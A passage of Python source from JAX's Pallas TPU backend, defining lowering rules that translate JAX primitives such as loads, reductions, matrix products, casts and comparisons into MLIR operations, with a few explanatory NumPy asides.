NDIndexer(splatted_idx_avals, ref_aval.shape,\n int_indexer_shape)\n return nd_indexer, nd_indexer_avals\n\n\ndef _get_lowering_rule(\n ctx: LoweringRuleContext, ref, *non_slice_idx, indexed_dims: Sequence[bool]\n):\n # Call _load_lowering_rule (since it's more general)\n ref_aval, *non_slice_idx_avals = ctx.avals_in\n nd_indexer, nd_indexer_avals = _convert_flat_indexing_to_indexer(\n ref_aval, non_slice_idx, non_slice_idx_avals, indexed_dims)\n flat_args, tree = tree_util.tree_flatten((nd_indexer,))\n flat_avals = tree_util.tree_leaves((nd_indexer_avals,))\n ctx = ctx.replace(avals_in=(ref_aval, *flat_avals))\n return _load_lowering_rule(ctx, ref, *flat_args, args_tree=tree,\n masked=False)\n\n\nlowering_rules[state_primitives.get_p] = _get_lowering_rule\n\n\ndef _swap_lowering_rule(\n ctx: LoweringRuleContext,\n ref,\n val,\n *non_slice_idx,\n indexed_dims: Sequence[bool],\n):\n # Call _masked_swap_lowering_rule (since it's more general)\n ref_aval, val_aval, *non_slice_idx_avals = ctx.avals_in\n nd_indexer, nd_indexer_avals = _convert_flat_indexing_to_indexer(\n ref_aval, non_slice_idx, non_slice_idx_avals, indexed_dims)\n flat_args, tree = tree_util.tree_flatten((nd_indexer,))\n flat_avals = tree_util.tree_leaves((nd_indexer_avals,))\n ctx = ctx.replace(avals_in=(ref_aval, val_aval, *flat_avals))\n return _masked_swap_lowering_rule(ctx, ref, val, *flat_args, args_tree=tree,\n masked=False)\n\nlowering_rules[state_primitives.swap_p] = _swap_lowering_rule\n\n\ndef _make_index(s):\n if isinstance(s, (int, np.ndarray)):\n return ir_constant(s, ir.IndexType.get())\n if s.type == ir.IndexType.get():\n return s\n return arith.IndexCastOp(ir.IndexType.get(), 
s).result\n\n\ndef _load_lowering_rule(\n    ctx: LoweringRuleContext, ref, *args, args_tree, masked, **params\n):\n  ref_type = ir.MemRefType(ref.type)\n  is_smem_load = str(ref_type.memory_space) == \"#tpu.memory_space<smem>\"\n  del params\n  if masked:\n    raise NotImplementedError\n  ref_aval, *_ = ctx.avals_in\n  (aval_out,) = ctx.avals_out\n  ref_block_shape, *_ = ctx.block_shapes\n  idx, *_ = tree_util.tree_unflatten(args_tree, args)\n  idx_aval, *_ = tree_util.tree_unflatten(args_tree, ctx.avals_in[1:])\n  indices = idx.indices\n  if not ref_block_shape:\n    raise NotImplementedError(\n        \"Indexing into a ()-shaped Ref not yet supported on TPU.\")\n  if any(\n      not isinstance(a, primitives.Slice) and a.shape != ()\n      for a in idx_aval.indices\n  ):\n    raise ValueError(\"Cannot do int indexing on TPU\")\n  starts = tuple(\n      i.start if isinstance(i, primitives.Slice) else i for i in indices\n  )\n  mlir_indices = [\n      s if isinstance(s, primitives.Slice) else _make_index(s) for s in starts\n  ]\n  # Need to now insert indexing the 0-th element for mapped dimensions\n  idx_iter = iter(mlir_indices)\n  mlir_indices = [\n      _make_index(0) if b is core.mapped else next(idx_iter)\n      for b in ref_block_shape\n  ]\n  assert len(mlir_indices) == len(ref_block_shape)\n  load_shape = list(aval_out.shape)\n  for i, a in enumerate(idx_aval.indices):\n    if not isinstance(a, primitives.Slice):\n      load_shape.insert(i, 1)\n  assert len(load_shape) == len(ref_aval.shape)\n  load_shape_iter = iter(load_shape)\n  load_shape = [\n      1 if b is core.mapped else next(load_shape_iter) for b in ref_block_shape\n  ]\n  load_aval = aval_out.update(shape=tuple(load_shape))\n  if is_smem_load:\n    if ctx.avals_out[0].shape:\n      raise ValueError(\"Can only load scalars from SMEM:\")\n    return memref.LoadOp(ref, mlir_indices).result\n  else:\n    load_val = vector.LoadOp(aval_to_ir_type(load_aval), ref, mlir_indices).result\n  if load_aval == aval_out:\n    return load_val\n  vec_type = ir.VectorType.get(aval_out.shape,\n                               mlir.dtype_to_ir_type(aval_out.dtype))\n  return vector.ShapeCastOp(vec_type, load_val).result\n\n\nlowering_rules[primitives.load_p] = _load_lowering_rule\n\n\ndef _masked_swap_lowering_rule(\n    ctx: LoweringRuleContext, ref, val, *args, args_tree, masked, **params\n):\n  del params\n  if masked:\n    raise NotImplementedError\n  ref_block_shape, *_ = ctx.block_shapes\n  ref_aval, val_aval, *_ = ctx.avals_in\n  (aval_out,) = ctx.avals_out\n  if not isinstance(val, ir.Value):\n    val = ir_constant(val, mlir_type=mlir.dtype_to_ir_type(val_aval.dtype))\n  idx, *_ = tree_util.tree_unflatten(args_tree, args)\n  idx_aval, *_ = tree_util.tree_unflatten(args_tree, ctx.avals_in[2:])\n  indices = idx.indices\n  if any(\n      not isinstance(a, primitives.Slice) and a.shape != ()\n      for a in idx_aval.indices\n  ):\n    raise ValueError(\"Cannot do int indexing on TPU\")\n  if not ref_block_shape:\n    raise NotImplementedError(\n        \"Indexing into a ()-shaped Ref not yet supported on TPU.\")\n  starts = tuple(\n      i.start if isinstance(i, primitives.Slice) else i for i in indices\n  )\n  mlir_indices = [\n      s if isinstance(s, primitives.Slice) else _make_index(s) for s in starts\n  ]\n  # Need to now insert indexing the 0-th element for mapped dimensions\n  idx_iter = iter(mlir_indices)\n  mlir_indices = [\n      _make_index(0) if b is core.mapped else next(idx_iter)\n      for b in ref_block_shape\n  ]\n  assert len(mlir_indices) == len(ref_block_shape)\n  mem_slice_shape = list(aval_out.shape)\n  for i, a in enumerate(idx_aval.indices):\n    if not isinstance(a, primitives.Slice):\n      mem_slice_shape.insert(i, 1)\n  
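# Collapse block-mapped dimensions down to size 1 so the slice shape agrees\n  # with the Ref's block shape before building the vector load/store below.\n  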
mem_slice_shape_iter = iter(mem_slice_shape)\n mem_slice_shape = [\n 1 if b is core.mapped else next(mem_slice_shape_iter)\n for b in ref_block_shape\n ]\n mem_aval = aval_out.update(shape=tuple(mem_slice_shape))\n mem_aval_vec_type = ir.VectorType.get(mem_aval.shape,\n mlir.dtype_to_ir_type(mem_aval.dtype))\n result = vector.LoadOp(mem_aval_vec_type, ref, mlir_indices).result\n if mem_aval != aval_out:\n # We are slicing a scalar, so we provide dummy 1-sized indices\n result_vec_type = ir.VectorType.get(aval_out.shape,\n mlir.dtype_to_ir_type(aval_out.dtype))\n result = vector.ShapeCastOp(result_vec_type, result).result\n val_vec_type = ir.VectorType.get(mem_aval.shape,\n mlir.dtype_to_ir_type(mem_aval.dtype))\n val = vector.ShapeCastOp(val_vec_type, val).result\n vector.StoreOp(val, ref, mlir_indices)\n return result\n\n\nlowering_rules[primitives.swap_p] = _masked_swap_lowering_rule\n\n\ndef _multiple_of_lowering_rule(ctx: LoweringRuleContext, val, *, values):\n del values\n return val\n\n\nlowering_rules[primitives.multiple_of_p] = _multiple_of_lowering_rule\n\n\ndef _reduce_max_lowering_rule(ctx: LoweringRuleContext, x, *, axes):\n (x_aval,) = ctx.avals_in\n out_type = aval_to_ir_type(ctx.avals_out[0])\n if jnp.issubdtype(x_aval.dtype, jnp.floating):\n kind = ir.Attribute.parse(\"#vector.kind<maxf>\")\n val = ir.FloatAttr.get(ir.F32Type.get(), float(\"-inf\"))\n identity = ir.DenseElementsAttr.get_splat(out_type, val)\n elif jnp.issubdtype(x_aval.dtype, jnp.signedinteger):\n kind = ir.Attribute.parse(\"#vector.kind<maxsi>\")\n raise NotImplementedError\n elif jnp.issubdtype(x_aval.dtype, jnp.unsignedinteger):\n kind = ir.Attribute.parse(\"#vector.kind<maxui>\")\n raise NotImplementedError\n acc = arith.ConstantOp(out_type, identity)\n op = vector.MultiDimReductionOp(\n kind,\n x,\n acc,\n ir.ArrayAttr.get(\n [ir.IntegerAttr.get(ir.IntegerType.get_signless(64), a) for a in axes]\n ),\n )\n return op.result\n\n\nlowering_rules[lax.reduce_max_p] = _reduce_max_lowering_rule\n\n\ndef _reduce_sum_lowering_rule(ctx: LoweringRuleContext, x, *, axes):\n (x_aval,) = ctx.avals_in\n out_type = aval_to_ir_type(ctx.avals_out[0])\n if jnp.issubdtype(x_aval.dtype, jnp.floating):\n kind = ir.Attribute.parse(\"#vector.kind<add>\")\n val = ir.FloatAttr.get(ir.F32Type.get(), 0.0)\n identity = ir.DenseElementsAttr.get_splat(out_type, val)\n elif jnp.issubdtype(x_aval.dtype, jnp.signedinteger):\n kind = ir.Attribute.parse(\"#vector.kind<add>\")\n raise NotImplementedError\n elif jnp.issubdtype(x_aval.dtype, jnp.unsignedinteger):\n kind = ir.Attribute.parse(\"#vector.kind<add>\")\n raise NotImplementedError\n acc = arith.ConstantOp(out_type, identity)\n op = vector.MultiDimReductionOp(\n kind,\n x,\n acc,\n ir.ArrayAttr.get(\n [ir.IntegerAttr.get(ir.IntegerType.get_signless(64), a) for a in axes]\n ),\n )\n return op.result\n\n\nlowering_rules[lax.reduce_sum_p] = _reduce_sum_lowering_rule\n\n\ndef _broadcast_in_dim_lowering_rule(\n ctx: LoweringRuleContext, val, *, shape, broadcast_dimensions\n):\n if isinstance(val, (np.generic, np.ndarray, int, float)):\n val = ir_constant(val, mlir.dtype_to_ir_type(ctx.avals_in[0].dtype))\n (aval_in,) = ctx.avals_in\n (aval_out,) = ctx.avals_out\n if broadcast_dimensions:\n out_shape_list = [1] * len(shape)\n for i, s in zip(broadcast_dimensions, aval_in.shape):\n out_shape_list[i] = s\n out_shape = tuple(out_shape_list)\n out_type = ir.VectorType.get(\n out_shape, mlir.dtype_to_ir_type(aval_out.dtype)\n )\n val = vector.ShapeCastOp(out_type, val).result\n if out_shape == aval_out.shape:\n return val\n out_type = 
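# --- Editor's aside (illustrative sketch, hypothetical shapes) ---
# The two reduction rules above seed the accumulator with the identity element
# of the combining operator (-inf for max, 0.0 for sum) and then emit a single
# vector.multi_reduction over the requested axes. The NumPy equivalent of what
# gets lowered:
import numpy as np

x = np.arange(12, dtype=np.float32).reshape(3, 4)
acc_max = np.full((3,), -np.inf, dtype=np.float32)  # identity for max
acc_sum = np.zeros((3,), dtype=np.float32)          # identity for add
for j in range(x.shape[1]):                         # reduce over axis 1
    acc_max = np.maximum(acc_max, x[:, j])
    acc_sum = acc_sum + x[:, j]
assert np.array_equal(acc_max, x.max(axis=1))
assert np.array_equal(acc_sum, x.sum(axis=1))
# --- end aside ---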
ir.VectorType.get(\n aval_out.shape, mlir.dtype_to_ir_type(aval_out.dtype)\n )\n return vector.BroadcastOp(out_type, val).result\n\n\nlowering_rules[lax.broadcast_in_dim_p] = _broadcast_in_dim_lowering_rule\n\n\ndef _dot_general_lowering_rule(\n ctx: LoweringRuleContext, x, y, dimension_numbers, precision, **_\n):\n (lhs_dims, rhs_dims), _ = dimension_numbers\n (aval_out,) = ctx.avals_out\n out_type = aval_to_ir_type(aval_out)\n if ctx.avals_out[0].dtype == jnp.float32:\n val = ir.FloatAttr.get(ir.F32Type.get(), 0.0)\n elif ctx.avals_out[0].dtype == jnp.float16:\n val = ir.FloatAttr.get(ir.F16Type.get(), 0.0)\n else:\n raise NotImplementedError(ctx.avals_out[0].dtype)\n if any(len(a.shape) != 2 for a in ctx.avals_in):\n raise NotImplementedError(ctx.avals_in)\n lhs_aval, _ = ctx.avals_in\n # This is really a matrix-vector product. It only looks like matrix-matrix.\n if lhs_dims == (1,) and rhs_dims == (1,) and ctx.avals_in[1].shape[0] == 1:\n if ctx.avals_in[0].shape != ctx.avals_in[1].shape:\n bcast_shape = jnp.broadcast_shapes(\n ctx.avals_in[0].shape, ctx.avals_out[0].shape\n )\n bcast_shape = ir.VectorType.get(\n list(bcast_shape), mlir.dtype_to_ir_type(ctx.avals_out[0].dtype)\n )\n if ctx.avals_in[0].shape != bcast_shape:\n x = vector.BroadcastOp(bcast_shape, x)\n if ctx.avals_in[1].shape != bcast_shape:\n y = vector.BroadcastOp(bcast_shape, y)\n red_type = aval_to_ir_type(lhs_aval.update(shape=(lhs_aval.shape[0],)))\n acc = arith.ConstantOp(\n red_type, ir.DenseElementsAttr.get_splat(red_type, val)\n )\n red = vector.MultiDimReductionOp(\n ir.Attribute.parse(\"#vector.kind<add>\"),\n arith.MulFOp(x, y),\n acc,\n ir.ArrayAttr.get(\n [ir.IntegerAttr.get(ir.IntegerType.get_signless(64), 1)]\n ),\n )\n return vector.ShapeCastOp(out_type, red).result\n\n if lhs_dims == (1,):\n lhs_dim_attr = ir.Attribute.parse(\"affine_map<(i, j, k) -> (i, k)>\")\n elif lhs_dims == (0,):\n lhs_dim_attr = ir.Attribute.parse(\"affine_map<(i, j, k) -> (k, i)>\")\n if rhs_dims == (0,):\n rhs_dim_attr = ir.Attribute.parse(\"affine_map<(i, j, k) -> (k, j)>\")\n elif rhs_dims == (1,):\n rhs_dim_attr = ir.Attribute.parse(\"affine_map<(i, j, k) -> (j, k)>\")\n out_tile = arith.ConstantOp(\n out_type, ir.DenseElementsAttr.get_splat(out_type, val)\n )\n op = vector.ContractionOp(\n out_type,\n x,\n y,\n out_tile,\n indexing_maps=ir.ArrayAttr.get([\n lhs_dim_attr,\n rhs_dim_attr,\n ir.Attribute.parse(\"affine_map<(i, j, k) -> (i, j)>\"),\n ]),\n iterator_types=ir.ArrayAttr.get([\n ir.Attribute.parse(\"#vector.iterator_type<parallel>\"),\n ir.Attribute.parse(\"#vector.iterator_type<parallel>\"),\n ir.Attribute.parse(\"#vector.iterator_type<reduction>\"),\n ]),\n )\n if precision is not None:\n if precision[0] != precision[1]:\n raise NotImplementedError(\"Per-operand dot precision unsupported\")\n precision = precision[0]\n if precision is None or precision == lax.Precision.DEFAULT:\n pass # That's the default in Mosaic.\n elif precision == lax.Precision.HIGHEST:\n op.attributes[\"precision\"] = ir.Attribute.parse(\n \"#tpu.contract_precision<fp32>\"\n )\n else:\n raise NotImplementedError(f\"Unsupported dot precision: {precision}\")\n return op.result\n\n\nlowering_rules[lax.dot_general_p] = _dot_general_lowering_rule\n\n_INT_DTYPES = {\n 8: np.dtype(np.int8),\n 16: np.dtype(np.int16),\n 32: np.dtype(np.int32),\n}\n\n\ndef _convert_element_type_lowering_rule(\n ctx: LoweringRuleContext, x, *, new_dtype, weak_type\n):\n del weak_type\n out_aval = ctx.avals_out[0]\n old_dtype = ctx.avals_in[0].dtype\n out_type = aval_to_ir_type(out_aval)\n if old_dtype == 
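# --- Editor's aside (illustrative sketch) ---
# The three indexing maps in the contraction above spell out an ordinary
# matmul: with iterators (i, j, k), the lhs map picks A[i, k], the rhs map
# picks B[k, j], and the output map picks C[i, j]; k is the lone reduction
# iterator. In plain Python the emitted op computes:
import numpy as np

A = np.random.rand(2, 3).astype(np.float32)
B = np.random.rand(3, 4).astype(np.float32)
C = np.zeros((2, 4), dtype=np.float32)   # the zero-splat `out_tile`
for i in range(2):
    for j in range(4):
        for k in range(3):               # reduction iterator
            C[i, j] += A[i, k] * B[k, j]
assert np.allclose(C, A @ B)
# --- end aside ---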
new_dtype:\n return x\n if jnp.issubdtype(old_dtype, jnp.floating) and jnp.issubdtype(\n new_dtype, jnp.floating\n ):\n if old_dtype.itemsize < new_dtype.itemsize:\n return arith.ExtFOp(out_type, x).result\n else:\n return arith.TruncFOp(out_type, x).result\n elif old_dtype == jnp.bool_ and jnp.issubdtype(new_dtype, jnp.integer):\n return arith.ExtSIOp(out_type, x).result\n elif jnp.issubdtype(old_dtype, jnp.signedinteger) and jnp.issubdtype(\n new_dtype, jnp.floating\n ):\n return arith.SIToFPOp(out_type, x).result\n elif jnp.issubdtype(old_dtype, jnp.signedinteger) and jnp.issubdtype(\n new_dtype, jnp.signedinteger\n ):\n if old_dtype.itemsize < new_dtype.itemsize:\n return arith.ExtSIOp(out_type, x).result\n else:\n return arith.TruncIOp(out_type, x).result\n elif jnp.issubdtype(old_dtype, jnp.floating) and jnp.issubdtype(\n new_dtype, jnp.signedinteger\n ):\n return arith.FPToSIOp(out_type, x).result\n raise NotImplementedError(f\"Unsupported cast: {old_dtype} -> {new_dtype}\")\n\n\nlowering_rules[lax.convert_element_type_p] = _convert_element_type_lowering_rule\n\n\ndef _bcast(x, y, x_aval, y_aval, out_aval):\n if isinstance(x, (np.ndarray, np.uint32, int, float)):\n if hasattr(y, \"type\") and y.type == ir.IndexType.get():\n mlir_type = y.type\n else:\n mlir_type = mlir.dtype_to_ir_type(x_aval.dtype)\n x = ir_constant(x, mlir_type)\n if isinstance(y, (np.ndarray, np.uint32, int, float)):\n if hasattr(x, \"type\") and x.type == ir.IndexType.get():\n mlir_type = x.type\n else:\n mlir_type = mlir.dtype_to_ir_type(y_aval.dtype)\n y = ir_constant(y, mlir_type)\n out_shape = out_aval.shape\n bcast_shape = ir.VectorType.get(\n list(out_shape), mlir.dtype_to_ir_type(out_aval.dtype)\n )\n if x_aval.shape != out_aval.shape:\n x = vector.BroadcastOp(bcast_shape, x)\n if y_aval.shape != out_aval.shape:\n y = vector.BroadcastOp(bcast_shape, y)\n return x, y\n\n\ndef _reshape_lowering_rule(ctx: LoweringRuleContext, x, new_sizes, dimensions):\n if dimensions is not None:\n raise NotImplementedError\n if any(d is None for d in new_sizes):\n raise NotImplementedError\n return vector.ShapeCastOp(aval_to_ir_type(ctx.avals_out[0]), x).result\n\n\nlowering_rules[lax.reshape_p] = _reshape_lowering_rule\n\n\ndef _iota_lowering_rule(ctx: LoweringRuleContext, dtype, shape, dimension):\n out_type = aval_to_ir_type(ctx.avals_out[0])\n return tpu.IotaOp(out_type, dimension=dimension).result\n\n\nlowering_rules[lax.iota_p] = _iota_lowering_rule\n\n\ndef _transpose_lowering_rule(ctx: LoweringRuleContext, x, *, permutation):\n if permutation != (1, 0):\n raise NotImplementedError\n out_type = aval_to_ir_type(ctx.avals_out[0])\n i64_type = ir.IntegerType.get_signless(64)\n transp = ir.ArrayAttr.get(\n [ir.IntegerAttr.get(i64_type, i) for i in permutation]\n )\n return vector.TransposeOp(out_type, x, transp).result\n\n\nlowering_rules[lax.transpose_p] = _transpose_lowering_rule\n\n\ndef _add_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.AddIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.AddFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.add_p] = _add_lowering_rule\n\n\ndef _max_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, 
jnp.signedinteger):\n return arith.MaxSIOp(x, y).result\n elif jnp.issubdtype(aval_out.dtype, jnp.unsignedinteger):\n return arith.MaxUIOp(x, y).result\n elif jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.MaxFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.max_p] = _max_lowering_rule\n\n\ndef _sub_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if isinstance(x, (np.ndarray, int, float)):\n x = ir_constant(x, y.type)\n elif isinstance(y, (np.ndarray, int, float)):\n y = ir_constant(y, x.type)\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.SubIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.SubFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.sub_p] = _sub_lowering_rule\n\n\ndef _mul_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if isinstance(x, (np.ndarray, int, float)):\n x = ir_constant(x, y.type)\n elif isinstance(y, (np.ndarray, int, float)):\n y = ir_constant(y, x.type)\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.MulIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.MulFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.mul_p] = _mul_lowering_rule\n\n\ndef _div_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.DivSIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.unsignedinteger):\n return arith.DivUIOp(x, y).result\n elif jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.DivFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.div_p] = _div_lowering_rule\n\n\ndef _rem_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.RemSIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.unsignedinteger):\n return arith.RemUIOp(x, y).result\n elif jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.RemFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.rem_p] = _rem_lowering_rule\n\n\ndef _abs_lowering_rule(ctx: LoweringRuleContext, x):\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return math.AbsIOp(x).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.abs_p] = _abs_lowering_rule\n\n\ndef _neg_lowering_rule(ctx: LoweringRuleContext, x):\n (x_aval,) = ctx.avals_in\n new_ctx = ctx.replace(\n avals_in=(jax_core.ShapedArray((), x_aval.dtype), x_aval),\n block_shapes=((), *ctx.block_shapes)\n )\n return _sub_lowering_rule(new_ctx, np.array(0, dtype=x_aval.dtype), x)\n\n\nlowering_rules[lax.neg_p] = _neg_lowering_rule\n\n\ndef _rsqrt_lowering_rule(ctx: LoweringRuleContext, x):\n return math.RsqrtOp(x).result\n\n\nlowering_rules[lax.rsqrt_p] = _rsqrt_lowering_rule\n\n\ndef _exp_lowering_rule(ctx: LoweringRuleContext, x):\n return math.ExpOp(x).result\n\n\nlowering_rules[lax.exp_p] = _exp_lowering_rule\n\n\ndef _pow_lowering_rule(ctx: LoweringRuleContext, x, y):\n if not isinstance(x, ir.Value) and x 
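# --- Editor's aside (illustrative sketch, helper is hypothetical) ---
# Every binary rule above follows the same shape: broadcast both operands to
# the output shape via _bcast, then pick the arith op by dtype family
# (integer vs. floating). That dispatch could be factored into a tiny helper:
import numpy as np

def lower_binop(int_op, float_op, dtype, x, y):
    """Pick the integer or floating-point flavor of a binary op by dtype."""
    if np.issubdtype(dtype, np.integer):
        return int_op(x, y)
    if np.issubdtype(dtype, np.floating):
        return float_op(x, y)
    raise NotImplementedError(dtype)

# Stand-ins for arith.AddIOp / arith.AddFOp:
assert lower_binop(lambda a, b: a + b, lambda a, b: a + b,
                   np.dtype(np.int32), 2, 3) == 5
# --- end aside ---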
== 2.:\n return math.Exp2Op(y).result\n raise NotImplementedError(\"Only support for 2^x\")\n\n\nlowering_rules[lax.pow_p] = _pow_lowering_rule\n\n\ndef _exp2_lowering_rule(ctx: LoweringRuleContext, x):\n # exp2 in JAX lowers to exp(ln2 * x), not to pow2. We match that behavior\n # here.\n return lower_fun(lambda x: jnp.exp(np.log(2) * x), multiple_results=False)(\n ctx, x)\n\n\nlowering_rules[lax.exp2_p] = _exp2_lowering_rule\n\ndef _logistic_lowering_rule(ctx: LoweringRuleContext, x):\n neg_x = arith.NegFOp(x).result\n exp_neg_x = math.ExpOp(neg_x).result\n aval_out = ctx.avals_out[0]\n out_type = ir.VectorType.get(\n aval_out.shape, mlir.dtype_to_ir_type(aval_out.dtype)\n )\n one = vector.BroadcastOp(out_type, ir_constant(1.0))\n denom = arith.AddFOp(one, exp_neg_x).result\n return arith.DivFOp(one, denom).result\n\n\nlowering_rules[lax.logistic_p] = _logistic_lowering_rule\n\n\ndef _tanh_lowering_rule(ctx: LoweringRuleContext, x):\n return math.TanhOp(x).result\n\n\nlowering_rules[lax.tanh_p] = _tanh_lowering_rule\n\n\ndef _log_lowering_rule(ctx: LoweringRuleContext, x):\n return math.LogOp(x).result\n\n\nlowering_rules[lax.log_p] = _log_lowering_rule\n\n_cmpi_lowering_types = {\n lax.eq_p: 0,\n lax.ne_p: 1,\n lax.lt_p: 2,\n lax.le_p: 3,\n lax.gt_p: 4,\n lax.ge_p: 5,\n}\n\n_cmpf_lowering_types = {\n lax.eq_p: 1,\n lax.ne_p: 6,\n}\n\n\ndef _cmp_lowering_rule(prim, ctx: LoweringRuleContext, x, y):\n x_aval, y_aval = ctx.avals_in\n x_dtype, y_dtype = x_aval.dtype, y_aval.dtype\n if isinstance(y, (np.generic, np.ndarray, int, float)):\n y = ir_constant(y, mlir_type=mlir.dtype_to_ir_type(y_dtype))\n if isinstance(x, (np.generic, np.ndarray, int, float)):\n x = ir_constant(x, mlir_type=mlir.dtype_to_ir_type(x_dtype))\n bcast_shape = np.broadcast_shapes(x_aval.shape, y_aval.shape)\n if x_aval.shape != bcast_shape:\n bcast_shape = ir.VectorType.get(\n list(bcast_shape), mlir.dtype_to_ir_type(x_aval.dtype)\n )\n x = vector.BroadcastOp(bcast_shape, x).result\n if y_aval.shape != bcast_shape:\n bcast_shape = ir.VectorType.get(\n list(bcast_shape), mlir.dtype_to_ir_type(y_aval.dtype)\n )\n y = vector.BroadcastOp(bcast_shape, y).result\n if jnp.issubdtype(x_dtype, jnp.integer) and jnp.issubdtype(\n y_dtype, jnp.integer\n ):\n pred = _cmpi_lowering_types[prim]\n predicate = ir.IntegerAttr.get(ir.IntegerType.get_signless(64), pred)\n return arith.CmpIOp(predicate, x, y).result\n elif jnp.issubdtype(x_dtype, jnp.floating) and jnp.issubdtype(\n y_dtype, jnp.floating\n ):\n pred = _cmpf_lowering_types[prim]\n predicate = ir.IntegerAttr.get(ir.IntegerType.get_signless(64), pred)\n return arith.CmpFOp(predicate, x, y).result\n raise NotImplementedError((x_dtype, y_dtype))\n\n\nlowering_rules[lax.eq_p] = functools.partial(_cmp_lowering_rule, lax.eq_p)\nlowering_rules[lax.ne_p] = functools.partial(_cmp_lowering_rule, lax.ne_p)\nlowering_rules[lax.lt_p] = functools.partial(_cmp_lowering_rule, lax.lt_p)\nlowering_rules[lax.le_p] = functools.partial(_cmp_lowering_rule, lax.le_p)\nlowering_rules[lax.gt_p] = functools.partial(_cmp_lowering_rule, lax.gt_p)\nlowering_rules[lax.ge_p] = functools.partial(_cmp_lowering_rule, lax.ge_p)\n\n\ndef _and_lowering_rule(ctx: LoweringRuleContext, lhs, rhs):\n return arith.AndIOp(lhs, rhs).result\n\n\nlowering_rules[lax.and_p] = _and_lowering_rule\n\n\ndef _or_lowering_rule(ctx: LoweringRuleContext, lhs, rhs):\n return arith.OrIOp(lhs, rhs).result\n\n\nlowering_rules[lax.or_p] = _or_lowering_rule\n\ndef _canonicalize_value(a: np.generic | np.ndarray | int | float | ir.Value,\n 
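# --- Editor's aside (illustrative reference, names taken from the MLIR
# arith dialect docs rather than this module) ---
# The integer codes in _cmpi_lowering_types / _cmpf_lowering_types above are
# the enum values of arith.cmpi / arith.cmpf predicates: for cmpi, 0..5 are
# eq, ne, slt (signed <), sle, sgt, sge; for cmpf, 1 is "oeq" (ordered equal)
# and 6 is "one" (ordered not-equal).
CMPI_PREDICATES = {0: "eq", 1: "ne", 2: "slt", 3: "sle", 4: "sgt", 5: "sge"}
CMPF_PREDICATES = {1: "oeq", 6: "one"}

def describe_predicate(code, is_float):
    table = CMPF_PREDICATES if is_float else CMPI_PREDICATES
    return table[code]

assert describe_predicate(2, is_float=False) == "slt"  # lax.lt_p on integers
# --- end aside ---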
dtype: np.dtype | None = None) -> ir.Value:\n # TODO(sharadmv): use this function in most lowering rules and allow some\n # rules to opt out.\n if isinstance(a, ir.Value):\n return a\n mlir_type = None\n if dtype is not None:\n mlir_type = mlir.dtype_to_ir_type(dtype)\n return ir_constant(a, mlir_type=mlir_type)\n\ndef _select_n_lowering_rule(ctx: LoweringRuleContext, pred, x, *args):\n if len(args) > 1:\n raise NotImplementedError(\"select_n only supported with <= 2 arguments\")\n pred_aval, x_aval = ctx.avals_in[:2]\n pred = _canonicalize_value(pred, dtype=pred_aval.dtype)\n if pred_aval.dtype != np.dtype(np.bool_):\n lower_ctx = LoweringRuleContext(\n ctx.lowering_context,\n avals_in=[pred_aval],\n avals_out=[pred_aval.update(dtype=np.bool_)],\n block_shapes=[None],\n )\n pred = lower_fun(lambda x: x != 0, multiple_results=False)(lower_ctx, pred)\n x_dtype = x_aval.dtype\n x = _canonicalize_value(x, dtype=x_dtype)\n if not args:\n return x\n args = map(partial(_canonicalize_value, dtype=x_dtype), args)\n # Assume x and y\n y, = args\n return arith.SelectOp(pred, y, x).result\n\n\nlowering_rules[lax.select_n_p] = _select_n_lowering_rule\n\ndef _for_lowering_rule(\n ctx: LoweringRuleContext,\n *args,\n jaxpr,\n nsteps,\n reverse,\n unroll,\n which_linear,\n):\n should_discharge = [\n not isinstance(aval, state.AbstractRef) for aval in ctx.avals_in\n ]\n jaxpr, () = state_discharge.discharge_state(\n jaxpr, (), should_discharge=[False, *should_discharge]\n )\n for i in range(nsteps):\n if reverse:\n i = nsteps - i - 1\n i = ir_constant(i)\n lowering_context = ctx.lowering_context.replace(\n block_shapes=[(), *ctx.block_shapes],\n )\n non_ref_args = jaxpr_subcomp(lowering_context, jaxpr, i, *args)\n non_ref_args_iter = iter(non_ref_args)\n args = [\n next(non_ref_args_iter) if s else a\n for 